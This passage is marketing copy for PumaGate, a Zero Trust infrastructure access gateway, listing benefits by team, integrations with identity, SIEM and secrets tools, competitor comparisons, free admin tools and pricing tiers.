- Access request approval workflows with Slack notifications and multi-level escalation
- Credential vaulting with HashiCorp Vault, AWS Secrets Manager, and Azure Key Vault integration
- Funnel links for controlled third-party access with automatic expiration and recording

### PumaGate for IT & Infrastructure Teams

IT teams manage access to hundreds of servers, Windows desktops, databases, and internal applications — often with a patchwork of VPNs, bastion hosts, and shared credentials. PumaGate consolidates everything into a single gateway with SCIM provisioning, automated onboarding/offboarding, and centralized policy management.
Centralize access management across every server, desktop, database, and app

Benefits:
- SCIM 2.0 provisioning automatically syncs users and groups from Okta, Azure AD, or Google Workspace
- Automated onboarding — new hires get access to the right resources instantly via IdP group membership
- Instant offboarding — removing a user from the IdP revokes all access across every protocol immediately
- Centralized dashboard shows all resources, active sessions, and access status in one place
- Multi-protocol support means one tool replaces separate SSH, RDP, VNC, database, and web app access solutions
- Health checks monitor resource availability and alert IT when servers or databases go offline
- Secure network access for legacy applications that require network-level connectivity
- Self-service access requests reduce IT ticket volume with approval workflows and auto-provisioning

# PumaGate for Engineering Teams

Engineers need to move fast. PumaGate provides instant SSH, database, and web app access through the browser or CLI — with SSO instead of SSH keys, per-user database sessions instead of shared passwords, and zero VPN configuration. Security happens in the background; engineers stay in flow.

Fast, secure access to dev, staging, and production — without context switching

Benefits:
- SSH via browser or native CLI — no SSH key management, no VPN, no bastion host
- Database access through the gateway — run queries against PostgreSQL, MySQL, and MongoDB with individual identity
- One-command CLI access via OAuth2 device flow — works with your existing terminal and scripts
- Browser-based RDP for Windows development environments and staging servers
- Switch between dev, staging, and production environments instantly — no VPN reconnection
- Just-in-time production access with lightweight approval — doesn't break your flow
- Session recording runs silently in the background — zero performance impact
- SCP file transfer through the gateway with the same identity-based access controls

# PumaGate for Compliance & GRC Teams

Compliance teams spend months gathering access evidence for audits. PumaGate generates continuous, tamper-proof audit trails across every SSH, RDP, VNC, database, and web app session — with automated reports mapped to SOC 2, ISO 27001, HIPAA, PCI DSS, SOX, and FedRAMP controls.

Continuous compliance evidence for every infrastructure access session

Benefits:
- Automated audit trail generation — every session is recorded with user identity, timestamp, and actions
- Compliance reports mapped to SOC 2, ISO 27001, HIPAA, PCI DSS, SOX, and NIST 800-53 controls
- Tamper-proof session recordings stored in your S3-compatible bucket with integrity verification
- Access reviews with exportable reports showing who has access to what, when, and why
- Separation of duties enforcement through role-based policies and approval workflows
- Just-in-time access with automatic expiration eliminates standing privileges — a key audit finding
- Data masking ensures sensitive information is not captured in session recordings
- SIEM integration provides real-time compliance monitoring alongside your existing security stack

# PumaGate for Platform Engineering

Platform engineering teams build internal developer platforms that abstract infrastructure complexity. PumaGate provides the access layer — a self-service portal where developers request and receive SSH, database, and application access through golden paths, with guardrails, approval workflows, and full observability built in.

Build a self-service access platform for your engineering organization

Benefits:
- Self-service access portal — developers request access through golden paths instead of filing tickets
- API-first design lets you integrate PumaGate into your internal developer platform and Backstage catalogs
- Resource groups and team policies define access templates that scale with your organization
- Approval workflows with Slack integration provide guardrails without creating bottlenecks
- Agent-based resource discovery automatically registers new infrastructure as it's provisioned
- Multi-gateway architecture supports platform teams managing access across multiple clusters and regions
- Session recording and audit trails are built into the platform — no separate tooling needed
- Terraform provider and API enable infrastructure-as-code access policy management

## Integrations

# Okta

Category: Identity Provider

Enterprise SSO and user provisioning with Okta for seamless Zero Trust access control.

Features:
- SAML 2.0 and OIDC SSO support
- Automatic user deprovisioning on Okta removal
- Group-based access policies
- MFA enforcement through Okta policies
- Just-in-time user provisioning
- Okta Verify push notifications
- Session management and SSO logout

Use cases:
- Centralize identity management for infrastructure access
- Enforce MFA for SSH, RDP, VNC, Kubernetes, and database connections
- Automate user lifecycle from hire to termination
- Apply group-based RBAC to all resources

# Microsoft Entra ID

Category: Identity Provider

Integrate with Microsoft Entra ID (Azure AD) for enterprise SSO and conditional access policies.

Features:
- SAML 2.0 and OIDC SSO integration
- Conditional Access policy support
- Azure MFA integration
- Entra ID P1/P2 feature support
- Microsoft Authenticator push notifications
- Group-based access control
- Hybrid identity support

Use cases:
- Extend Microsoft 365 identity to infrastructure access
- Apply Conditional Access policies to SSH, RDP, VNC, and Kubernetes
- Leverage existing Azure security investments
- Unify identity across cloud and on-premise resources

# Google Workspace

Category: Identity Provider

SSO and user provisioning with Google Workspace for organizations using Google Cloud identity.

Features:
- SAML 2.0 SSO with Google Workspace
- OIDC authentication support
- Google Groups for access control
- Automatic user provisioning via Google Directory API
- Google 2-Step Verification support
- Google Authenticator integration
- Domain-wide delegation support
- Admin console management

Use cases:
- Use Google accounts for infrastructure access
- Leverage Google Groups for RBAC policies
- Enforce Google 2-Step Verification for all access
- Automate user management from Google Admin

# Auth0

Category: Identity Provider

Flexible identity platform integration with Auth0 for SSO and social login support.

Features:
- SAML and OIDC SSO support
- Social login connections
- Enterprise connections (AD, LDAP)
- Auth0 Universal Login
- MFA with Auth0 Guardian
- Custom rules and actions
- User management API integration
- Passwordless authentication

Use cases:
- Enable flexible authentication options for teams
- Support contractor access via social logins
- Implement passwordless access to infrastructure
- Custom authentication flows for compliance

# OneLogin

Category: Identity Provider

Enterprise SSO and user provisioning with OneLogin for unified access management.

Features:
- SAML 2.0 and OIDC SSO
- OneLogin Protect MFA
- Smart Factor Authentication
- User lifecycle management
- Directory integration
- Access policies and rules
- Session management

Use cases:
- Extend OneLogin to infrastructure access
- Enforce Smart Factor Authentication for sensitive resources
- Automate user provisioning from HR systems
- Apply role-based access across all resources

# Duo Security

Category: Identity Provider

Enforce Duo MFA for all infrastructure access with push notifications and device trust.

Features:
- Duo Push notifications for MFA
- Device trust and health checks
- Adaptive access policies
- Duo Universal Prompt
- Hardware token support
- Bypass codes for emergency access
- Admin panel for policy management
- Detailed authentication logs

Use cases:
- Add MFA to all infrastructure access
- Verify device health before granting access
- Implement adaptive authentication policies
- Provide emergency bypass capabilities

# JumpCloud

Category: Identity Provider

Cloud directory integration with JumpCloud for SSO and device management.

Features:
- SAML 2.0 SSO integration
- JumpCloud Directory for user provisioning
- Group-based access control
- MFA enforcement
- Device management integration
- Conditional access policies
- LDAP and RADIUS support
- Cross-platform identity

Use cases:
- Extend JumpCloud to infrastructure access
- Leverage device trust for access decisions
- Unify identity across cloud and on-premise
- SMB-friendly Zero Trust implementation

# SAML 2.0

Category: Identity Provider

Connect any SAML 2.0 compliant identity provider for enterprise SSO integration.

Features:
- SAML 2.0 SP-initiated SSO
- IdP-initiated SSO support
- Signed assertions and responses
- Encrypted assertions
- Attribute statement mapping
- NameID format configuration
- Single Logout (SLO)
- Metadata exchange

Use cases:
- Integrate with on-premise ADFS
- Connect to Shibboleth IdP
- Custom enterprise IdP integration
- Multi-IdP federation scenarios

# OpenID Connect

Category: Identity Provider

Connect any OpenID Connect provider for modern OAuth 2.0 based authentication.

Features:
- OIDC Authorization Code flow
- PKCE support for enhanced security
- ID Token and Access Token validation
- Userinfo endpoint integration
- Custom scope configuration
- Claim mapping to user attributes
- Token refresh handling
- Discovery document auto-configuration

Use cases:
- Integrate with custom OAuth servers
- Connect cloud-native identity platforms
- Modern authentication for new deployments
- API-first identity integration

# Splunk

Category: SIEM

Forward session recordings and audit logs to Splunk for security analysis and compliance.

Features:
- HTTP Event Collector (HEC) integration
- Real-time event streaming
- Session recording metadata forwarding
- Access granted/denied events
- User authentication events
- Policy violation alerts
- Custom field mapping
- Splunk Enterprise and Cloud support

Use cases:
- Centralize access logs for SOC teams
- Correlate access events with security incidents
- Generate compliance reports from access data
- Detect anomalous access patterns

# Elastic SIEM

Category: SIEM

Stream access events to Elastic SIEM for threat detection and security analytics.

Features:
- Elasticsearch HTTP API integration
- Logstash input support
- Beats integration option
- ECS field mapping
- Real-time event indexing
- Session recording metadata
- Custom index patterns
- Elastic Cloud and self-hosted support

Use cases:
- Unified security analytics platform
- Machine learning anomaly detection on access
- Custom detection rules for policy violations
- Long-term audit log retention

# Microsoft Sentinel

Category: SIEM

Forward audit logs to Microsoft Sentinel for cloud-native SIEM and security orchestration.

Features:
- Log Analytics workspace integration
- CEF/Syslog forwarding support
- Azure Event Hub streaming
- Custom table ingestion
- Built-in detection rules
- SOAR playbook triggers
- Incident correlation
- Azure-native security integration

Use cases:
- Unify Azure and infrastructure security
- Correlate access with Microsoft 365 events
- Automated incident response playbooks
- Cloud-native SOC operations

# Datadog

Category: SIEM

Send access logs and session metadata to Datadog for observability and security monitoring.

Features:
- Datadog Logs API integration
- Real-time event forwarding
- Custom tags and attributes
- Session recording metadata
- Access pattern dashboards
- Security signal correlation
- Log pipeline processing
- Cloud and on-premise support

Use cases:
- Unify access logs with application observability
- Correlate access events with APM traces
- Security monitoring dashboards
- Access pattern analytics

# PagerDuty

Category: Alerting

On-call access provisioning and access alerts through PagerDuty incident management.

Features:
- On-call schedule-based access
- Access alerts and incidents
- Just-in-time access during incidents
- Runbook integration
- Event orchestration
- Access request escalation
- PagerDuty Events API v2
- Schedule sync for access policies

Use cases:
- Grant production access to on-call engineers
- Alert on failed access attempts
- Incident-triggered access provisioning
- Escalation for access requests

# HashiCorp Vault

Category: Secrets Management

Dynamic credential injection with HashiCorp Vault for just-in-time secrets.

Features:
- Dynamic database credentials
- Certificate authority
- Just-in-time credential injection
- Lease management and renewal
- AppRole and JWT authentication
- Namespace support
- Transit encryption engine
- Vault Enterprise support

Use cases:
- Eliminate static database credentials
- Certificates instead of keys
- Time-limited credential access
- Centralized secrets management

# AWS Secrets Manager

Category: Secrets Management

Retrieve and inject credentials from AWS Secrets Manager for AWS-native deployments.

Features:
- Secret retrieval via IAM roles
- Cross-account secret access
- Resource-based policies
- Secrets versioning
- AWS PrivateLink support
- KMS encryption integration
- CloudTrail audit logging

Use cases:
- AWS-native secrets management
- RDS and Aurora credential injection
- Cross-account database access
- Just-in-time credential retrieval

# Slack

Category: Communication

Access request notifications and approvals through Slack for instant team communication.

Features:
- Access request notifications
- Interactive approval buttons
- Security alert channels
- Session recording alerts
- Slash commands for access status
- Channel-based team routing
- Block Kit rich messages
- Slack Enterprise Grid support

Use cases:
- Real-time access request notifications
- One-click approvals for just-in-time access
- Security alert distribution
- Team-based access workflows

# Microsoft Teams

Category: Communication

Access notifications and approvals through Microsoft Teams for Microsoft-centric organizations.

Features:
- Incoming webhook notifications
- Adaptive Card approvals
- Teams channel routing
- Security alert cards
- Bot-based interactions
- Team-based approval workflows
- Message actions for quick access
- Microsoft 365 integration

Use cases:
- Microsoft 365-native access workflows
- Teams-based approval routing
- Real-time security notifications
- Cross-team access visibility

# AWS

Category: Cloud Platform

Secure access to AWS EC2, RDS, and other resources without exposing them to the internet.

Features:
- EC2 instance access via SSM-less connections
- RDS and Aurora database access
- EKS cluster access
- VPC-native deployment options
- IAM role-based authentication
- AWS PrivateLink support
- Cross-account access
- CloudTrail integration

Use cases:
- Secure EC2 access without public IPs
- RDS access without VPN or bastion
- Multi-account AWS access management
- EKS cluster administration

# Google Cloud

Category: Cloud Platform

Secure access to GCE, Cloud SQL, and GKE without exposing resources publicly.

Features:
- GCE instance access
- Cloud SQL database connections
- GKE cluster access
- VPC-native deployment
- Service account authentication
- Private Google Access support
- Multi-project access
- Cloud Audit Logs integration

Use cases:
- Secure GCE access in private VPCs
- Cloud SQL without public IP
- GKE administration access
- Cross-project resource access

# Microsoft Azure

Category: Cloud Platform

Secure access to Azure VMs, Azure SQL, and AKS with Entra ID integration.

Features:
- Azure VM access (SSH and RDP)
- Azure SQL database connections
- AKS cluster access
- VNet-native deployment
- Entra ID authentication
- Private Endpoint support
- Cross-subscription access
- Azure Activity Log integration

Use cases:
- Windows VM access via Linux proxy (no direct RDP exposure)
- Azure SQL without public endpoint
- AKS administration access
- Hybrid cloud access management

# Ping Identity

Category: Identity Provider

Enterprise SSO and adaptive authentication with Ping Identity for secure Zero Trust access to infrastructure.

Features:
- PingFederate SAML 2.0 and OIDC federation
- PingOne Cloud SSO support
- Adaptive MFA with PingID
- SCIM user and group provisioning
- Risk-based authentication policies
- Directory integration with PingDirectory

Use cases:
- Federate enterprise identity for infrastructure access
- Enforce adaptive MFA on privileged sessions
- Automate user provisioning and deprovisioning via SCIM
- Apply context-aware access policies based on risk score

# Keycloak

Category: Identity Provider

Open-source SSO and identity federation with Keycloak for self-hosted Zero Trust authentication.

Features:
- SAML 2.0 and OIDC SSO integration
- User federation from LDAP and Active Directory
- Realm-based multi-tenancy support
- Group and role synchronization
- Custom authentication flows
- Self-hosted identity with full data sovereignty

Use cases:
- Self-hosted SSO for restricted or regulated environments
- Federate LDAP and Active Directory identities for infrastructure access
- Enforce custom authentication flows for privileged sessions
- Map Keycloak realm roles to PumaGate RBAC policies
- Maintain full data sovereignty with on-premise identity

# CyberArk Vault

Category: Secrets Management

Privileged credential retrieval from CyberArk Vault for enterprise-grade secrets injection.

Features:
- Central Credential Provider (CCP) integration
- Conjur secrets retrieval support
- Just-in-time privileged credential injection
- Credential rotation policy compliance
- Safe-based access control mapping
- Dual-control approval workflows

Use cases:
- Inject vaulted credentials into database sessions without exposing passwords
- Enforce credential rotation policies across all managed resources
- Integrate privileged access workflows with CyberArk safe policies
- Eliminate standing privileged accounts on infrastructure
- Satisfy audit requirements with end-to-end credential tracking

# Sumo Logic

Category: SIEM

Cloud-native log analytics and SIEM with Sumo Logic for real-time access event intelligence.

Features:
- HTTP Hosted Collector integration
- Structured JSON event forwarding
- Real-time access dashboards
- Cloud SIEM correlation rules
- Field extraction for access events
- Scheduled compliance report generation

Use cases:
- Correlate infrastructure access events with application logs
- Detect anomalous access patterns with Cloud SIEM analytics
- Generate compliance reports for SOC 2 and ISO 27001 audits
- Build real-time dashboards for security operations teams

# IBM QRadar

Category: SIEM

Enterprise SIEM integration with IBM QRadar for advanced threat detection on infrastructure access.

Features:
- Syslog and LEEF event forwarding
- QRadar REST API integration
- Custom DSM log source support
- Offense correlation with access events
- Compliance reporting for PCI DSS and HIPAA
- Network activity baseline integration

Use cases:
- Correlate access events with network-level threat intelligence
- Trigger QRadar offenses on unauthorized access attempts
- Generate regulatory compliance reports from access audit data
- Integrate infrastructure access into existing SOC workflows
- Detect lateral movement through access pattern analysis

# ServiceNow

Category: ITSM

IT service management integration with ServiceNow for automated access request ticketing and approval workflows.

Features:
- Automated access request ticket creation
- Multi-level approval workflows
- CMDB integration for resource inventory
- Change management integration
- SLA tracking for access provisioning
- ServiceNow REST API and MID Server support

Use cases:
- Route access requests through ServiceNow approval workflows
- Track access provisioning SLAs in ServiceNow dashboards
- Sync infrastructure resources with ServiceNow CMDB
- Integrate access changes with change management processes
- Audit access requests with ServiceNow ticket history

# Opsgenie

Category: Incident Management

Incident-driven access management with Opsgenie for on-call alerting and escalation workflows.

Features:
- Alert creation via Opsgenie REST API
- On-call schedule-based access provisioning
- Escalation policy triggers on access violations
- Incident-scoped temporary access grants
- Team-based alert routing
- Opsgenie integration with Jira Service Management

Use cases:
- Alert on-call teams on failed access attempts or policy violations
- Grant temporary production access during active incidents
- Escalate unacknowledged access requests through Opsgenie policies
- Route access alerts to the correct team based on resource ownership

# New Relic

Category: Observability

Full-stack observability with New Relic for monitoring infrastructure access performance and security events.

Features:
- Event API and Log API integration
- Custom dashboards for access metrics
- NRQL queries on access event data
- Alert conditions for access anomalies
- Infrastructure agent correlation
- Service level objective tracking for access latency

Use cases:
- Monitor access session latency and connection health
- Correlate infrastructure access with application performance metrics
- Set alert conditions on unusual access patterns or failures
- Build unified dashboards spanning application and access telemetry
- Track access SLOs alongside application SLOs

# CrowdStrike

Category: Endpoint Security

Device trust and endpoint posture verification with CrowdStrike Falcon for context-aware access control.

Features:
- Falcon Zero Trust Assessment (ZTA) score integration
- Device posture verification before access
- Endpoint compliance checks for managed devices
- Real-time threat intelligence from Falcon sensors
- Conditional access based on device risk score
- CrowdStrike Falcon API integration

Use cases:
- Block access from endpoints with active threats detected by Falcon
- Enforce minimum ZTA scores for privileged resource access
- Verify endpoint compliance before granting database connections
- Correlate endpoint risk with infrastructure access policies
- Restrict access from unmanaged or non-compliant devices

# SailPoint

Category: Identity Governance

Identity governance and access certification with SailPoint for lifecycle management and compliance.

Features:
- Access certification campaign integration
- Entitlement synchronization with IdentityNow
- Separation of duties policy enforcement
- Automated joiner-mover-leaver workflows
- Role mining and access recommendations
- Compliance reporting for SOX and GDPR

Use cases:
- Automate periodic access certification reviews for infrastructure
- Enforce separation of duties across database and server access
- Synchronize role-based entitlements from SailPoint to PumaGate
- Streamline joiner-mover-leaver processes for infrastructure access
- Generate governance reports for regulatory compliance audits

## Comparisons

# PumaGate vs Teleport
Teleport — Infrastructure access platform
Compare browser-based Zero Trust access with certificate-based infrastructure access.

# PumaGate vs StrongDM
StrongDM — Infrastructure access platform
Compare browser-based access and visual session recordings with client-based access.

# PumaGate vs Tailscale
Tailscale — WireGuard-based VPN mesh
Compare Zero Trust gateway access with VPN mesh for infrastructure security.

# PumaGate vs HashiCorp Boundary
HashiCorp Boundary — Identity-based access management
Compare managed Zero Trust access with self-hosted identity-based access.

# PumaGate vs Cloudflare Access
Cloudflare Access — Zero Trust network access
Compare purpose-built infrastructure access with broad Zero Trust network access.

# PumaGate vs CyberArk
CyberArk — Privileged access management
Compare modern cloud-native access with traditional enterprise PAM.

# PumaGate vs Fortinet VPN (FortiClient)
Fortinet VPN (FortiClient) — Traditional VPN & endpoint security
Compare true Zero Trust per-resource access with traditional VPN — plus how PumaGate differs from Fortinet's own ZTNA.

# PumaGate vs Forcepoint VPN Client
Forcepoint VPN Client — Traditional VPN client with network-level access
Compare PumaGate's Zero Trust gateway with Forcepoint's VPN client — and see how both differ from Forcepoint's own Zero Trust solution.

# PumaGate vs Zscaler Private Access (ZPA)
Zscaler Private Access (ZPA) — Cloud-based Zero Trust network access (ZTNA)
Compare PumaGate's session-level Zero Trust with Zscaler ZPA's connection-level access — and see why session recording changes everything.

# PumaGate vs Cisco VPN (AnyConnect / Secure Client)
Cisco VPN (AnyConnect / Secure Client) — Traditional VPN client with network-level access
Compare PumaGate's Zero Trust gateway with Cisco AnyConnect — the world's most deployed VPN client — and see why Zero Trust is fundamentally safer.

# PumaGate vs Sophos Connect
Sophos Connect — Traditional VPN client for Sophos Firewall
Compare PumaGate's architecture-level Zero Trust — browser-based, agentless, per-resource access — with Sophos Connect's VPN approach and Sophos ZTNA.

# PumaGate vs Ubiquiti Teleport
Ubiquiti Teleport — Hardware-based remote access VPN
Compare PumaGate's Zero Trust per-resource gateway with Ubiquiti Teleport's hardware-dependent network VPN — and see why Zero Trust is fundamentally safer.

# PumaGate vs Palo Alto GlobalProtect VPN
Palo Alto GlobalProtect VPN — Enterprise VPN tied to next-gen firewalls
Compare PumaGate's architecture-level Zero Trust — browser-based, per-resource access with full session recording — with Palo Alto's appliance-dependent GlobalProtect VPN and Prisma Access ZTNA.

# PumaGate vs BeyondTrust
BeyondTrust — Privileged access management platform
Compare PumaGate's lightweight Zero Trust gateway with BeyondTrust's enterprise PAM suite — and see how modern access differs from legacy PAM.

# PumaGate vs Delinea (Thycotic)
Delinea (Thycotic) — Privileged access management and secrets
Compare PumaGate's unified Zero Trust gateway with Delinea's Secret Server and Connection Manager — modern access vs traditional PAM.

# PumaGate vs Twingate
Twingate — Software-defined Zero Trust network access
Compare PumaGate's browser-based, session-recorded access with Twingate's client-based network access — and see why session-level control matters.

# PumaGate vs Netskope Private Access
Netskope Private Access — SASE platform with private access
Compare PumaGate's focused Zero Trust gateway with Netskope's SASE-embedded private access — purpose-built vs part of a larger platform.

# PumaGate vs NordLayer
NordLayer — Business VPN and Zero Trust access
Compare PumaGate's session-level Zero Trust with NordLayer's VPN-first approach — and see how per-resource access with audit trails changes security.

# PumaGate vs Keeper Security
Keeper Security — Password management and PAM
Compare PumaGate's Zero Trust access gateway with Keeper's connection manager — and see how integrated SSO, recording, and Zero Trust differ from vault-based access.

# PumaGate vs Pritunl
Pritunl — Open-source VPN server
Compare PumaGate's Zero Trust per-resource access with Pritunl's network-level VPN — and see why session recording and identity-based access change security fundamentally.

## Tools

# SSH Config Builder
Visual SSH config generator with ProxyJump chains, wildcard patterns, and hardening best practices

# OpenSSH Hardening Generator
sshd_config generator with security profiles for different OS and OpenSSH versions

# Database Connection String Builder
Connection string generator for PostgreSQL, MySQL, MongoDB, Redis, SQL Server with code snippets

# Linux User Provisioning Generator
Generate idempotent Linux user setup scripts with SSH keys, sudo policies, and group membership

# Firewall Rules Generator
Define access policies and export as iptables, nftables, ufw, AWS Security Group, or Terraform rules

# Access Review Report Builder
Generate quarterly audit reports with automated findings for SOC 2, HIPAA, and PCI-DSS

# SSH Key Inventory Auditor
Analyze SSH public keys for algorithm strength, duplicates, and security recommendations

# Compliance Access Control Mapper
Cross-reference access control requirements across SOC 2, HIPAA, PCI-DSS, ISO 27001, and NIST 800-53

# Incident Response Playbook Generator
Step-by-step response procedures for access-related security incidents

# Infrastructure Attack Surface Analyzer
Risk-scored assessment of exposed services with prioritized hardening roadmap

# AD User Audit PowerShell Generator
PowerShell scripts to list Active Directory users by activity within configurable time windows

# AD Password Reset PowerShell Generator
Bulk password reset scripts for Active Directory users with group filtering and policy controls

# AD Authentication Audit PowerShell Generator
PowerShell scripts to list authentication events for AD users across Domain Controllers

# AD User Creation PowerShell Generator
Create fully-configured Active Directory users with all attributes in single or bulk CSV mode

# AD Hardening Audit PowerShell Generator
Comprehensive Active Directory security assessment aligned with CIS Benchmarks and NIST 800-53

# LDAP Authentication with OpenSSH Guide
Complete guide to LDAP authentication for OpenSSH using SSSD, PAM, and public key lookup

# RBAC Policy Generator
Define roles, permissions, and resource access rules. Export as JSON, YAML, or policy documents

# Zero Trust Readiness Assessment
Evaluate your organization's Zero Trust readiness with scored assessment and recommendations

# SSH Login Banner Generator
Create legal warning banners for /etc/issue, /etc/motd, and sshd_config with compliance templates

# Network ACL Generator
Build access control lists for iptables, AWS Security Groups, Azure NSG, and GCP firewall rules

# Password Policy Generator
Create enterprise password policies with complexity rules, rotation schedules, and compliance mappings

# MFA Readiness Assessment
Evaluate MFA deployment readiness with recommendations for methods, rollout, and user communication

## Pricing

### Solo — $9 per month

Annual: $9 per month

For a single user. 1 user, 15 resources, 14-day retention.

- SSH access with session recording
- Secure Network Access (1 peer)
- Basic SSO & MFA enforcement
- Audit logs & native CLI
- Basic alerting & email notifications
- 15 resources, 14-day retention

### Team — $19 per user / month

Annual: $15 per user / month, billed annually

For teams of any size. Multi-user, 200 resources, 30-day retention.

- Everything in Solo, plus:
- Multi-user organisation
- RDP, Database & Web App access
- SAML/OIDC SSO & Teams RBAC
- Secure Network Access (5 peers)
- Audit log export, API & Terraform
- Basic alerting & notifications (Email, Slack, Discord, Teams)
- 200 resources, 30-day retention

### Business — $29 per user / month

Annual: $22 per user / month, billed annually

For compliance-ready teams. Multi-user, ∞ resources, 90-day retention.

- Everything in Team, plus:
- Kubernetes API proxy & kubectl exec recording
- gRPC-aware proxy with per-method ACL
- Telnet gateway with session recording
- Just-in-Time access & approval workflows
- Dedicated gateways
- Unlimited resources, network access & web apps
- Security policies (reauth, idle timeout, MFA)
- Advanced alerting & all notification channels
- SOC 2, SIEM & compliance reports
- Session risk analysis & endpoint posture
- 500 GB storage, 90-day retention
- Priority support

### Enterprise — Custom

Full control at scale. Multi-user, ∞ resources, 1-year retention.

- Everything in Business, plus:
- Unlimited resources & network access peers
- Kubernetes cluster auto-discovery
- HIPAA & compliance attestation
- Dedicated deployment managed by PumaGate
- 1-year retention, 2 TB+ storage
- SLA-backed dedicated support